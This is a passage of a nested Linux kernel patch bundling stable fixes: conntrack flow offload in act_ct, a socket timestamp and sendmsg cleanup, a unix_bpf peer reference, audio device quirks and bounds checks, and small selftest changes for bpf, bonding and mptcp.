++		tcf_ct_flow_tc_ifidx(entry, act_ct_ext, FLOW_OFFLOAD_DIR_ORIGINAL);
++		tcf_ct_flow_tc_ifidx(entry, act_ct_ext, FLOW_OFFLOAD_DIR_REPLY);
++	}
++}
++
+ static void tcf_ct_flow_table_add(struct tcf_ct_flow_table *ct_ft,
+ 				  struct nf_conn *ct,
+-				  bool tcp)
++				  bool tcp, bool bidirectional)
+ {
+ 	struct nf_conn_act_ct_ext *act_ct_ext;
+ 	struct flow_offload *entry;
+@@ -384,6 +426,8 @@ static void tcf_ct_flow_table_add(struct tcf_ct_flow_table *ct_ft,
+ 		ct->proto.tcp.seen[0].flags |= IP_CT_TCP_FLAG_BE_LIBERAL;
+ 		ct->proto.tcp.seen[1].flags |= IP_CT_TCP_FLAG_BE_LIBERAL;
+ 	}
++	if (bidirectional)
++		__set_bit(NF_FLOW_HW_BIDIRECTIONAL, &entry->flags);
+ 
+ 	act_ct_ext = nf_conn_act_ct_ext_find(ct);
+ 	if (act_ct_ext) {
+@@ -407,26 +451,34 @@ static void tcf_ct_flow_table_process_conn(struct tcf_ct_flow_table *ct_ft,
+ 					   struct nf_conn *ct,
+ 					   enum ip_conntrack_info ctinfo)
+ {
+-	bool tcp = false;
+-
+-	if ((ctinfo != IP_CT_ESTABLISHED && ctinfo != IP_CT_ESTABLISHED_REPLY) ||
+-	    !test_bit(IPS_ASSURED_BIT, &ct->status))
+-		return;
++	bool tcp = false, bidirectional = true;
+ 
+ 	switch (nf_ct_protonum(ct)) {
+ 	case IPPROTO_TCP:
+-		tcp = true;
+-		if (ct->proto.tcp.state != TCP_CONNTRACK_ESTABLISHED)
++		if ((ctinfo != IP_CT_ESTABLISHED &&
++		     ctinfo != IP_CT_ESTABLISHED_REPLY) ||
++		    !test_bit(IPS_ASSURED_BIT, &ct->status) ||
++		    ct->proto.tcp.state != TCP_CONNTRACK_ESTABLISHED)
+ 			return;
++
++		tcp = true;
+ 		break;
+ 	case IPPROTO_UDP:
++		if (!nf_ct_is_confirmed(ct))
++			return;
++		if (!test_bit(IPS_ASSURED_BIT, &ct->status))
++			bidirectional = false;
+ 		break;
+ #ifdef CONFIG_NF_CT_PROTO_GRE
+ 	case IPPROTO_GRE: {
+ 		struct nf_conntrack_tuple *tuple;
+ 
+-		if (ct->status & IPS_NAT_MASK)
++		if ((ctinfo != IP_CT_ESTABLISHED &&
++		     ctinfo != IP_CT_ESTABLISHED_REPLY) ||
++		    !test_bit(IPS_ASSURED_BIT, &ct->status) ||
++		    ct->status & IPS_NAT_MASK)
+ 			return;
++
+ 		tuple = &ct->tuplehash[IP_CT_DIR_ORIGINAL].tuple;
+ 		/* No support for GRE v1 */
+ 		if (tuple->src.u.gre.key || tuple->dst.u.gre.key)
+@@ -442,7 +494,7 @@ static void tcf_ct_flow_table_process_conn(struct tcf_ct_flow_table *ct_ft,
+ 	    ct->status & IPS_SEQ_ADJUST)
+ 		return;
+ 
+-	tcf_ct_flow_table_add(ct_ft, ct, tcp);
++	tcf_ct_flow_table_add(ct_ft, ct, tcp, bidirectional);
+ }
+ 
+ static bool
+@@ -596,6 +648,7 @@ static bool tcf_ct_flow_table_lookup(struct tcf_ct_params *p,
+ 	struct flow_offload_tuple tuple = {};
+ 	enum ip_conntrack_info ctinfo;
+ 	struct tcphdr *tcph = NULL;
++	bool force_refresh = false;
+ 	struct flow_offload *flow;
+ 	struct nf_conn *ct;
+ 	u8 dir;
+@@ -621,15 +674,40 @@ static bool tcf_ct_flow_table_lookup(struct tcf_ct_params *p,
+ 	flow = container_of(tuplehash, struct flow_offload, tuplehash[dir]);
+ 	ct = flow->ct;
+ 
++	if (dir == FLOW_OFFLOAD_DIR_REPLY &&
++	    !test_bit(NF_FLOW_HW_BIDIRECTIONAL, &flow->flags)) {
++		/* Only offload reply direction after connection became
++		 * assured.
++		 */
++		if (test_bit(IPS_ASSURED_BIT, &ct->status))
++			set_bit(NF_FLOW_HW_BIDIRECTIONAL, &flow->flags);
++		else if (test_bit(NF_FLOW_HW_ESTABLISHED, &flow->flags))
++			/* If flow_table flow has already been updated to the
++			 * established state, then don't refresh.
++			 */
++			return false;
++		force_refresh = true;
++	}
++
+ 	if (tcph && (unlikely(tcph->fin || tcph->rst))) {
+ 		flow_offload_teardown(flow);
+ 		return false;
+ 	}
+ 
+-	ctinfo = dir == FLOW_OFFLOAD_DIR_ORIGINAL ? IP_CT_ESTABLISHED :
+-						    IP_CT_ESTABLISHED_REPLY;
++	if (dir == FLOW_OFFLOAD_DIR_ORIGINAL)
++		ctinfo = test_bit(IPS_SEEN_REPLY_BIT, &ct->status) ?
++			IP_CT_ESTABLISHED : IP_CT_NEW;
++	else
++		ctinfo = IP_CT_ESTABLISHED_REPLY;
++
++	nf_conn_act_ct_ext_fill(skb, ct, ctinfo);
++	tcf_ct_flow_ct_ext_ifidx_update(flow);
++	flow_offload_refresh(nf_ft, flow, force_refresh);
++	if (!test_bit(IPS_ASSURED_BIT, &ct->status)) {
++		/* Process this flow in SW to allow promoting to ASSURED */
++		return false;
++	}
+ 
+-	flow_offload_refresh(nf_ft, flow);
+ 	nf_conntrack_get(&ct->ct_general);
+ 	nf_ct_set(skb, ct, ctinfo);
+ 	if (nf_ft->flags & NF_FLOWTABLE_COUNTER)
+@@ -832,18 +910,23 @@ out_free:
+ 	return err;
+ }
+ 
+-static void tcf_ct_params_free(struct rcu_head *head)
++static void tcf_ct_params_free(struct tcf_ct_params *params)
+ {
+-	struct tcf_ct_params *params = container_of(head,
+-						    struct tcf_ct_params, rcu);
+-
+-	tcf_ct_flow_table_put(params);
+-
++	if (params->ct_ft)
++		tcf_ct_flow_table_put(params->ct_ft);
+ 	if (params->tmpl)
+ 		nf_ct_put(params->tmpl);
+ 	kfree(params);
+ }
+ 
++static void tcf_ct_params_free_rcu(struct rcu_head *head)
++{
++	struct tcf_ct_params *params;
++
++	params = container_of(head, struct tcf_ct_params, rcu);
++	tcf_ct_params_free(params);
++}
++
+ #if IS_ENABLED(CONFIG_NF_NAT)
+ /* Modelled after nf_nat_ipv[46]_fn().
+  * range is only used for new, uninitialized NAT state.
+@@ -1121,7 +1204,7 @@ do_nat:
+ 		tcf_ct_act_set_labels(ct, p->labels, p->labels_mask);
+ 
+ 		if (!nf_ct_is_confirmed(ct))
+-			nf_conn_act_ct_ext_add(ct);
++			nf_conn_act_ct_ext_add(skb, ct, ctinfo);
+ 
+ 		/* This will take care of sending queued events
+ 		 * even if the connection is already confirmed.
+@@ -1390,7 +1473,7 @@ static int tcf_ct_init(struct net *net, struct nlattr *nla,
+ 
+ 	err = tcf_ct_flow_table_get(net, params);
+ 	if (err)
+-		goto cleanup_params;
++		goto cleanup;
+ 
+ 	spin_lock_bh(&c->tcf_lock);
+ 	goto_ch = tcf_action_set_ctrlact(*a, parm->action, goto_ch);
+@@ -1401,17 +1484,15 @@ static int tcf_ct_init(struct net *net, struct nlattr *nla,
+ 	if (goto_ch)
+ 		tcf_chain_put_by_act(goto_ch);
+ 	if (params)
+-		call_rcu(&params->rcu, tcf_ct_params_free);
++		call_rcu(&params->rcu, tcf_ct_params_free_rcu);
+ 
+ 	return res;
+ 
+-cleanup_params:
+-	if (params->tmpl)
+-		nf_ct_put(params->tmpl);
+ cleanup:
+ 	if (goto_ch)
+ 		tcf_chain_put_by_act(goto_ch);
+-	kfree(params);
++	if (params)
++		tcf_ct_params_free(params);
+ 	tcf_idr_release(*a, bind);
+ 	return err;
+ }
+@@ -1423,7 +1504,7 @@ static void tcf_ct_cleanup(struct tc_action *a)
+ 
+ 	params = rcu_dereference_protected(c->params, 1);
+ 	if (params)
+-		call_rcu(&params->rcu, tcf_ct_params_free);
++		call_rcu(&params->rcu, tcf_ct_params_free_rcu);
+ }
+ 
+ static int tcf_ct_dump_key_val(struct sk_buff *skb,
+diff --git a/net/sched/em_text.c b/net/sched/em_text.c
+index 6f3c1fb2fb44c..f176afb70559e 100644
+--- a/net/sched/em_text.c
++++ b/net/sched/em_text.c
+@@ -97,8 +97,10 @@ retry:
+ 
+ static void em_text_destroy(struct tcf_ematch *m)
+ {
+-	if (EM_TEXT_PRIV(m) && EM_TEXT_PRIV(m)->config)
++	if (EM_TEXT_PRIV(m) && EM_TEXT_PRIV(m)->config) {
+ 		textsearch_destroy(EM_TEXT_PRIV(m)->config);
++		kfree(EM_TEXT_PRIV(m));
++	}
+ }
+ 
+ static int em_text_dump(struct sk_buff *skb, struct tcf_ematch *m)
+diff --git a/net/smc/smc_diag.c b/net/smc/smc_diag.c
+index 80ea7d954eceb..801044e7d1949 100644
+--- a/net/smc/smc_diag.c
++++ b/net/smc/smc_diag.c
+@@ -153,8 +153,7 @@ static int __smc_diag_dump(struct sock *sk, struct sk_buff *skb,
+ 			.lnk[0].link_id = link->link_id,
+ 		};
+ 
+-		memcpy(linfo.lnk[0].ibname,
+-		       smc->conn.lgr->lnk[0].smcibdev->ibdev->name,
++		memcpy(linfo.lnk[0].ibname, link->smcibdev->ibdev->name,
+ 		       sizeof(link->smcibdev->ibdev->name));
+ 		smc_gid_be16_convert(linfo.lnk[0].gid, link->gid);
+ 		smc_gid_be16_convert(linfo.lnk[0].peer_gid, link->peer_gid);
+diff --git a/net/socket.c b/net/socket.c
+index 04cba91c7cbe5..639d76f20384e 100644
+--- a/net/socket.c
++++ b/net/socket.c
+@@ -130,6 +130,7 @@ static ssize_t sock_sendpage(struct file *file, struct page *page,
+ static ssize_t sock_splice_read(struct file *file, loff_t *ppos,
+ 				struct pipe_inode_info *pipe, size_t len,
+ 				unsigned int flags);
++static void sock_splice_eof(struct file *file);
+ 
+ #ifdef CONFIG_PROC_FS
+ static void sock_show_fdinfo(struct seq_file *m, struct file *f)
+@@ -164,6 +165,7 @@ static const struct file_operations socket_file_ops = {
+ 	.sendpage =	sock_sendpage,
+ 	.splice_write = generic_splice_sendpage,
+ 	.splice_read =	sock_splice_read,
++	.splice_eof =	sock_splice_eof,
+ 	.show_fdinfo =	sock_show_fdinfo,
+ };
+ 
+@@ -740,6 +742,7 @@ int sock_sendmsg(struct socket *sock, struct msghdr *msg)
+ {
+ 	struct sockaddr_storage *save_addr = (struct sockaddr_storage *)msg->msg_name;
+ 	struct sockaddr_storage address;
++	int save_len = msg->msg_namelen;
+ 	int ret;
+ 
+ 	if (msg->msg_name) {
+@@ -749,6 +752,7 @@ int sock_sendmsg(struct socket *sock, struct msghdr *msg)
+ 
+ 	ret = __sock_sendmsg(sock, msg);
+ 	msg->msg_name = save_addr;
++	msg->msg_namelen = save_len;
+ 
+ 	return ret;
+ }
+@@ -826,7 +830,7 @@ static bool skb_is_swtx_tstamp(const struct sk_buff *skb, int false_tstamp)
+ 
+ static ktime_t get_timestamp(struct sock *sk, struct sk_buff *skb, int *if_index)
+ {
+-	bool cycles = sk->sk_tsflags & SOF_TIMESTAMPING_BIND_PHC;
++	bool cycles = READ_ONCE(sk->sk_tsflags) & SOF_TIMESTAMPING_BIND_PHC;
+ 	struct skb_shared_hwtstamps *shhwtstamps = skb_hwtstamps(skb);
+ 	struct net_device *orig_dev;
+ 	ktime_t hwtstamp;
+@@ -878,12 +882,12 @@ void __sock_recv_timestamp(struct msghdr *msg, struct sock *sk,
+ 	int need_software_tstamp = sock_flag(sk, SOCK_RCVTSTAMP);
+ 	int new_tstamp = sock_flag(sk, SOCK_TSTAMP_NEW);
+ 	struct scm_timestamping_internal tss;
+-
+ 	int empty = 1, false_tstamp = 0;
+ 	struct skb_shared_hwtstamps *shhwtstamps =
+ 		skb_hwtstamps(skb);
+ 	int if_index;
+ 	ktime_t hwtstamp;
++	u32 tsflags;
+ 
+ 	/* Race occurred between timestamp enabling and packet
+ 	   receiving.  Fill in the current time for now. */
+@@ -925,11 +929,12 @@ void __sock_recv_timestamp(struct msghdr *msg, struct sock *sk,
+ 	}
+ 
+ 	memset(&tss, 0, sizeof(tss));
+-	if ((sk->sk_tsflags & SOF_TIMESTAMPING_SOFTWARE) &&
++	tsflags = READ_ONCE(sk->sk_tsflags);
++	if ((tsflags & SOF_TIMESTAMPING_SOFTWARE) &&
+ 	    ktime_to_timespec64_cond(skb->tstamp, tss.ts + 0))
+ 		empty = 0;
+ 	if (shhwtstamps &&
+-	    (sk->sk_tsflags & SOF_TIMESTAMPING_RAW_HARDWARE) &&
++	    (tsflags & SOF_TIMESTAMPING_RAW_HARDWARE) &&
+ 	    !skb_is_swtx_tstamp(skb, false_tstamp)) {
+ 		if_index = 0;
+ 		if (skb_shinfo(skb)->tx_flags & SKBTX_HW_TSTAMP_NETDEV)
+@@ -937,14 +942,14 @@ void __sock_recv_timestamp(struct msghdr *msg, struct sock *sk,
+ 		else
+ 			hwtstamp = shhwtstamps->hwtstamp;
+ 
+-		if (sk->sk_tsflags & SOF_TIMESTAMPING_BIND_PHC)
++		if (tsflags & SOF_TIMESTAMPING_BIND_PHC)
+ 			hwtstamp = ptp_convert_timestamp(&hwtstamp,
+-							 sk->sk_bind_phc);
++							 READ_ONCE(sk->sk_bind_phc));
+ 
+ 		if (ktime_to_timespec64_cond(hwtstamp, tss.ts + 2)) {
+ 			empty = 0;
+ 
+-			if ((sk->sk_tsflags & SOF_TIMESTAMPING_OPT_PKTINFO) &&
++			if ((tsflags & SOF_TIMESTAMPING_OPT_PKTINFO) &&
+ 			    !skb_is_err_queue(skb))
+ 				put_ts_pktinfo(msg, skb, if_index);
+ 		}
+@@ -1088,6 +1093,14 @@ static ssize_t sock_splice_read(struct file *file, loff_t *ppos,
+ 	return sock->ops->splice_read(sock, ppos, pipe, len, flags);
+ }
+ 
++static void sock_splice_eof(struct file *file)
++{
++	struct socket *sock = file->private_data;
++
++	if (sock->ops->splice_eof)
++		sock->ops->splice_eof(sock);
++}
++
+ static ssize_t sock_read_iter(struct kiocb *iocb, struct iov_iter *to)
+ {
+ 	struct file *file = iocb->ki_filp;
+@@ -2128,6 +2141,7 @@ int __sys_sendto(int fd, void __user *buff, size_t len, unsigned int flags,
+ 		msg.msg_name = (struct sockaddr *)&address;
+ 		msg.msg_namelen = addr_len;
+ 	}
++	flags &= ~MSG_INTERNAL_SENDMSG_FLAGS;
+ 	if (sock->file->f_flags & O_NONBLOCK)
+ 		flags |= MSG_DONTWAIT;
+ 	msg.msg_flags = flags;
+@@ -2479,6 +2493,7 @@ static int ____sys_sendmsg(struct socket *sock, struct msghdr *msg_sys,
+ 		msg_sys->msg_control = ctl_buf;
+ 		msg_sys->msg_control_is_user = false;
+ 	}
++	flags &= ~MSG_INTERNAL_SENDMSG_FLAGS;
+ 	msg_sys->msg_flags = flags;
+ 
+ 	if (sock->file->f_flags & O_NONBLOCK)
+diff --git a/net/unix/af_unix.c b/net/unix/af_unix.c
+index 6dbeb80073338..be2ed7b0fe21c 100644
+--- a/net/unix/af_unix.c
++++ b/net/unix/af_unix.c
+@@ -211,8 +211,6 @@ static inline bool unix_secdata_eq(struct scm_cookie *scm, struct sk_buff *skb)
+ }
+ #endif /* CONFIG_SECURITY_NETWORK */
+ 
+-#define unix_peer(sk) (unix_sk(sk)->peer)
+-
+ static inline int unix_our_peer(struct sock *sk, struct sock *osk)
+ {
+ 	return unix_peer(osk) == sk;
+diff --git a/net/unix/unix_bpf.c b/net/unix/unix_bpf.c
+index 2f9d8271c6ec7..7ea7c3a0d0d06 100644
+--- a/net/unix/unix_bpf.c
++++ b/net/unix/unix_bpf.c
+@@ -159,12 +159,17 @@ int unix_dgram_bpf_update_proto(struct sock *sk, struct sk_psock *psock, bool re
+ 
+ int unix_stream_bpf_update_proto(struct sock *sk, struct sk_psock *psock, bool restore)
+ {
++	struct sock *sk_pair;
++
+ 	if (restore) {
+ 		sk->sk_write_space = psock->saved_write_space;
+ 		sock_replace_proto(sk, psock->sk_proto);
+ 		return 0;
+ 	}
+ 
++	sk_pair = unix_peer(sk);
++	sock_hold(sk_pair);
++	psock->sk_pair = sk_pair;
+ 	unix_stream_bpf_check_needs_rebuild(psock->sk_proto);
+ 	sock_replace_proto(sk, &unix_stream_bpf_prot);
+ 	return 0;
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index a88ed60dcd96a..1c8ffc5cf97f6 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -9581,6 +9581,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x84da, "HP OMEN dc0019-ur", ALC295_FIXUP_HP_OMEN),
+ 	SND_PCI_QUIRK(0x103c, 0x84e7, "HP Pavilion 15", ALC269_FIXUP_HP_MUTE_LED_MIC3),
+ 	SND_PCI_QUIRK(0x103c, 0x8519, "HP Spectre x360 15-df0xxx", ALC285_FIXUP_HP_SPECTRE_X360),
++	SND_PCI_QUIRK(0x103c, 0x8537, "HP ProBook 440 G6", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+ 	SND_PCI_QUIRK(0x103c, 0x860f, "HP ZBook 15 G6", ALC285_FIXUP_HP_GPIO_AMP_INIT),
+ 	SND_PCI_QUIRK(0x103c, 0x861f, "HP Elite Dragonfly G1", ALC285_FIXUP_HP_GPIO_AMP_INIT),
+ 	SND_PCI_QUIRK(0x103c, 0x869d, "HP", ALC236_FIXUP_HP_MUTE_LED),
+@@ -9663,6 +9664,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x89c6, "Zbook Fury 17 G9", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x89ca, "HP", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+ 	SND_PCI_QUIRK(0x103c, 0x89d3, "HP EliteBook 645 G9 (MB 89D2)", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
++	SND_PCI_QUIRK(0x103c, 0x8a0f, "HP Pavilion 14-ec1xxx", ALC287_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8a20, "HP Laptop 15s-fq5xxx", ALC236_FIXUP_HP_MUTE_LED_COEFBIT2),
+ 	SND_PCI_QUIRK(0x103c, 0x8a25, "HP Victus 16-d1xxx (MB 8A25)", ALC245_FIXUP_HP_MUTE_LED_COEFBIT),
+ 	SND_PCI_QUIRK(0x103c, 0x8a78, "HP Dev One", ALC285_FIXUP_HP_LIMIT_INT_MIC_BOOST),
+@@ -9707,6 +9709,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x8c70, "HP EliteBook 835 G11", ALC287_FIXUP_CS35L41_I2C_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8c71, "HP EliteBook 845 G11", ALC287_FIXUP_CS35L41_I2C_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8c72, "HP EliteBook 865 G11", ALC287_FIXUP_CS35L41_I2C_2_HP_GPIO_LED),
++	SND_PCI_QUIRK(0x103c, 0x8c96, "HP", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+ 	SND_PCI_QUIRK(0x103c, 0x8ca4, "HP ZBook Fury", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8ca7, "HP ZBook Fury", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8cf5, "HP ZBook Studio 16", ALC245_FIXUP_CS35L41_SPI_4_HP_GPIO_LED),
+@@ -9904,6 +9907,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1558, 0xc019, "Clevo NH77D[BE]Q", ALC293_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1558, 0xc022, "Clevo NH77[DC][QW]", ALC293_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x17aa, 0x1036, "Lenovo P520", ALC233_FIXUP_LENOVO_MULTI_CODECS),
++	SND_PCI_QUIRK(0x17aa, 0x3882, "Lenovo Yoga Pro 7 14APH8", ALC287_FIXUP_YOGA9_14IAP7_BASS_SPK_PIN),
+ 	SND_PCI_QUIRK(0x17aa, 0x1048, "ThinkCentre Station", ALC623_FIXUP_LENOVO_THINKSTATION_P340),
+ 	SND_PCI_QUIRK(0x17aa, 0x20f2, "Thinkpad SL410/510", ALC269_FIXUP_SKU_IGNORE),
+ 	SND_PCI_QUIRK(0x17aa, 0x215e, "Thinkpad L512", ALC269_FIXUP_SKU_IGNORE),
+diff --git a/sound/soc/fsl/fsl_rpmsg.c b/sound/soc/fsl/fsl_rpmsg.c
+index bf94838bdbefe..5c07a8ff0c9c0 100644
+--- a/sound/soc/fsl/fsl_rpmsg.c
++++ b/sound/soc/fsl/fsl_rpmsg.c
+@@ -231,7 +231,7 @@ static int fsl_rpmsg_probe(struct platform_device *pdev)
+ 	ret = devm_snd_soc_register_component(&pdev->dev, &fsl_component,
+ 					      &fsl_rpmsg_dai, 1);
+ 	if (ret)
+-		return ret;
++		goto err_pm_disable;
+ 
+ 	rpmsg->card_pdev = platform_device_register_data(&pdev->dev,
+ 							 "imx-audio-rpmsg",
+@@ -241,16 +241,22 @@ static int fsl_rpmsg_probe(struct platform_device *pdev)
+ 	if (IS_ERR(rpmsg->card_pdev)) {
+ 		dev_err(&pdev->dev, "failed to register rpmsg card\n");
+ 		ret = PTR_ERR(rpmsg->card_pdev);
+-		return ret;
++		goto err_pm_disable;
+ 	}
+ 
+ 	return 0;
++
++err_pm_disable:
++	pm_runtime_disable(&pdev->dev);
++	return ret;
+ }
+ 
+ static int fsl_rpmsg_remove(struct platform_device *pdev)
+ {
+ 	struct fsl_rpmsg *rpmsg = platform_get_drvdata(pdev);
+ 
++	pm_runtime_disable(&pdev->dev);
++
+ 	if (rpmsg->card_pdev)
+ 		platform_device_unregister(rpmsg->card_pdev);
+ 
+diff --git a/sound/soc/mediatek/mt8186/mt8186-dai-adda.c b/sound/soc/mediatek/mt8186/mt8186-dai-adda.c
+index 094402470dc23..858b95b199dcb 100644
+--- a/sound/soc/mediatek/mt8186/mt8186-dai-adda.c
++++ b/sound/soc/mediatek/mt8186/mt8186-dai-adda.c
+@@ -499,7 +499,7 @@ static const struct snd_soc_dapm_widget mtk_dai_adda_widgets[] = {
+ 			      SND_SOC_DAPM_PRE_PMU | SND_SOC_DAPM_POST_PMD),
+ 
+ 	SND_SOC_DAPM_SUPPLY_S("AUD_PAD_TOP", SUPPLY_SEQ_ADDA_AUD_PAD_TOP,
+-			      0, 0, 0,
++			      AFE_AUD_PAD_TOP, RG_RX_FIFO_ON_SFT, 0,
+ 			      mtk_adda_pad_top_event,
+ 			      SND_SOC_DAPM_PRE_PMU),
+ 	SND_SOC_DAPM_SUPPLY_S("ADDA_MTKAIF_CFG", SUPPLY_SEQ_ADDA_MTKAIF_CFG,
+diff --git a/sound/soc/meson/g12a-toacodec.c b/sound/soc/meson/g12a-toacodec.c
+index ddc667956cf5e..8d8d848ebd58b 100644
+--- a/sound/soc/meson/g12a-toacodec.c
++++ b/sound/soc/meson/g12a-toacodec.c
+@@ -71,6 +71,9 @@ static int g12a_toacodec_mux_put_enum(struct snd_kcontrol *kcontrol,
+ 	struct soc_enum *e = (struct soc_enum *)kcontrol->private_value;
+ 	unsigned int mux, reg;
+ 
++	if (ucontrol->value.enumerated.item[0] >= e->items)
++		return -EINVAL;
++
+ 	mux = snd_soc_enum_item_to_val(e, ucontrol->value.enumerated.item[0]);
+ 	regmap_field_read(priv->field_dat_sel, &reg);
+ 
+@@ -101,7 +104,7 @@ static int g12a_toacodec_mux_put_enum(struct snd_kcontrol *kcontrol,
+ 
+ 	snd_soc_dapm_mux_update_power(dapm, kcontrol, mux, e, NULL);
+ 
+-	return 0;
++	return 1;
+ }
+ 
+ static SOC_ENUM_SINGLE_DECL(g12a_toacodec_mux_enum, TOACODEC_CTRL0,
+diff --git a/sound/soc/meson/g12a-tohdmitx.c b/sound/soc/meson/g12a-tohdmitx.c
+index 579a04ad4d197..154c324fdd42a 100644
+--- a/sound/soc/meson/g12a-tohdmitx.c
++++ b/sound/soc/meson/g12a-tohdmitx.c
+@@ -45,6 +45,9 @@ static int g12a_tohdmitx_i2s_mux_put_enum(struct snd_kcontrol *kcontrol,
+ 	struct soc_enum *e = (struct soc_enum *)kcontrol->private_value;
+ 	unsigned int mux, changed;
+ 
++	if (ucontrol->value.enumerated.item[0] >= e->items)
++		return -EINVAL;
++
+ 	mux = snd_soc_enum_item_to_val(e, ucontrol->value.enumerated.item[0]);
+ 	changed = snd_soc_component_test_bits(component, e->reg,
+ 					      CTRL0_I2S_DAT_SEL,
+@@ -93,6 +96,9 @@ static int g12a_tohdmitx_spdif_mux_put_enum(struct snd_kcontrol *kcontrol,
+ 	struct soc_enum *e = (struct soc_enum *)kcontrol->private_value;
+ 	unsigned int mux, changed;
+ 
++	if (ucontrol->value.enumerated.item[0] >= e->items)
++		return -EINVAL;
++
+ 	mux = snd_soc_enum_item_to_val(e, ucontrol->value.enumerated.item[0]);
+ 	changed = snd_soc_component_test_bits(component, TOHDMITX_CTRL0,
+ 					      CTRL0_SPDIF_SEL,
+@@ -112,7 +118,7 @@ static int g12a_tohdmitx_spdif_mux_put_enum(struct snd_kcontrol *kcontrol,
+ 
+ 	snd_soc_dapm_mux_update_power(dapm, kcontrol, mux, e, NULL);
+ 
+-	return 0;
++	return 1;
+ }
+ 
+ static SOC_ENUM_SINGLE_DECL(g12a_tohdmitx_spdif_mux_enum, TOHDMITX_CTRL0,
+diff --git a/tools/testing/selftests/bpf/verifier/ld_imm64.c b/tools/testing/selftests/bpf/verifier/ld_imm64.c
+index f9297900cea6d..78f19c255f20b 100644
+--- a/tools/testing/selftests/bpf/verifier/ld_imm64.c
++++ b/tools/testing/selftests/bpf/verifier/ld_imm64.c
+@@ -9,8 +9,8 @@
+ 	BPF_MOV64_IMM(BPF_REG_0, 2),
+ 	BPF_EXIT_INSN(),
+ 	},
+-	.errstr = "invalid BPF_LD_IMM insn",
+-	.errstr_unpriv = "R1 pointer comparison",
++	.errstr = "jump into the middle of ldimm64 insn 1",
++	.errstr_unpriv = "jump into the middle of ldimm64 insn 1",
+ 	.result = REJECT,
+ },
+ {
+@@ -23,8 +23,8 @@
+ 	BPF_LD_IMM64(BPF_REG_0, 1),
+ 	BPF_EXIT_INSN(),
+ 	},
+-	.errstr = "invalid BPF_LD_IMM insn",
+-	.errstr_unpriv = "R1 pointer comparison",
++	.errstr = "jump into the middle of ldimm64 insn 1",
++	.errstr_unpriv = "jump into the middle of ldimm64 insn 1",
+ 	.result = REJECT,
+ },
+ {
+diff --git a/tools/testing/selftests/drivers/net/bonding/bond-arp-interval-causes-panic.sh b/tools/testing/selftests/drivers/net/bonding/bond-arp-interval-causes-panic.sh
+index 71c00bfafbc99..2ff58fed76e28 100755
+--- a/tools/testing/selftests/drivers/net/bonding/bond-arp-interval-causes-panic.sh
++++ b/tools/testing/selftests/drivers/net/bonding/bond-arp-interval-causes-panic.sh
+@@ -33,16 +33,16 @@ ip netns add "client"
+ ip link set dev link1_1 netns client down name eth0
+ ip netns exec client ip link add dev bond0 down type bond mode 1 \
+ 	miimon 100 all_slaves_active 1
+-ip netns exec client ip link set dev eth0 down master bond0
++ip netns exec client ip link set dev eth0 master bond0
+ ip netns exec client ip link set dev bond0 up
+ ip netns exec client ip addr add ${client_ip4}/24 dev bond0
+ ip netns exec client ping -c 5 $server_ip4 >/dev/null
+ 
+-ip netns exec client ip link set dev eth0 down nomaster
++ip netns exec client ip link set dev eth0 nomaster
+ ip netns exec client ip link set dev bond0 down
+ ip netns exec client ip link set dev bond0 type bond mode 0 \
+ 	arp_interval 1000 arp_ip_target "+${server_ip4}"
+-ip netns exec client ip link set dev eth0 down master bond0
++ip netns exec client ip link set dev eth0 master bond0
+ ip netns exec client ip link set dev bond0 up
+ ip netns exec client ping -c 5 $server_ip4 >/dev/null
+ 
+diff --git a/tools/testing/selftests/net/mptcp/mptcp_join.sh b/tools/testing/selftests/net/mptcp/mptcp_join.sh
+index e52d513009fb0..2107579e2939d 100755
+--- a/tools/testing/selftests/net/mptcp/mptcp_join.sh
++++ b/tools/testing/selftests/net/mptcp/mptcp_join.sh
+@@ -2167,9 +2167,9 @@ link_failure_tests()
+ 		pm_nl_set_limits $ns1 0 2
+ 		pm_nl_add_endpoint $ns1 10.0.2.1 dev ns1eth2 flags signal
+ 		pm_nl_set_limits $ns2 1 2
+-		FAILING_LINKS="1"
+ 		pm_nl_add_endpoint $ns2 10.0.3.2 dev ns2eth3 flags subflow,backup
+-		run_tests $ns1 $ns2 10.0.1.1 1
++		FAILING_LINKS="1" \
++			run_tests $ns1 $ns2 10.0.1.1 1
+ 		chk_join_nr 2 2 2
+ 		chk_add_nr 1 1
+ 		chk_link_usage $ns2 ns2eth3 $cinsent 0
+@@ -2183,8 +2183,8 @@ link_failure_tests()
+ 		pm_nl_add_endpoint $ns1 10.0.2.1 dev ns1eth2 flags signal
+ 		pm_nl_set_limits $ns2 1 2
+ 		pm_nl_add_endpoint $ns2 10.0.3.2 dev ns2eth3 flags subflow,backup
+-		FAILING_LINKS="1 2"
+-		run_tests $ns1 $ns2 10.0.1.1 1
++		FAILING_LINKS="1 2" \
++			run_tests $ns1 $ns2 10.0.1.1 1
+ 		chk_join_nr 2 2 2
+ 		chk_add_nr 1 1
+ 		chk_stale_nr $ns2 2 4 2
+@@ -2199,8 +2199,8 @@ link_failure_tests()
+ 		pm_nl_add_endpoint $ns1 10.0.2.1 dev ns1eth2 flags signal
